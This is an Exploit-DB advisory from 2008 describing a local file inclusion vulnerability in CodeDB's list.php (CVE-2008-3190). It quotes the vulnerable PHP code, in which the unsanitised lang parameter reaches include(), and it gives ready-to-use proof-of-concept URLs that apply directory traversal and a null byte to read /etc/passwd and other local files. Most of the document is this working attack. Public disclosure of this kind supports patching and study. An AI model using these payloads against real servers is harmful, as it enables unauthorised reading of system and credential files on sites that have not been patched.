CodeDB list.php lang Local File Inclusion Vulnerability

2008-07-14T00:00:00
ID EDB-ID:6071
Type exploitdb
Reporter cOndemned
Modified 2008-07-14T00:00:00

Description

CodeDB (list.php lang) Local File Inclusion Vulnerability. CVE-2008-3190. Webapps exploit for php platform

                                        
                                            ###############################################################################
#
#   Name    :   CodeDB (list.php lang) Local File Inclusion Vulnerability
#   Author  :   cOndemned
#   Greetz  :   ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*
#
###############################################################################

Source :

    // list.php
    
    2.  $lang = htmlspecialchars($_GET['lang']);            // ok, but.... for what ? lol
    
    7.  if(file_exists('templates/'.$lang.'_middle.php'))   // We'll have to cut off rest of filename & extension
	8.      include('templates/'.$lang.'_middle.php');      // Ekhm... pwned ;d
    
    
Proof of Concept :

    http://[host]/[codeDB_path]/list.php?lang=../readme.txt%00
    http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd%00
    http://[host]/[codeDB_path]/list.php?lang=../[local_file]%00

    
EoF.   

# milw0rm.com [2008-07-14]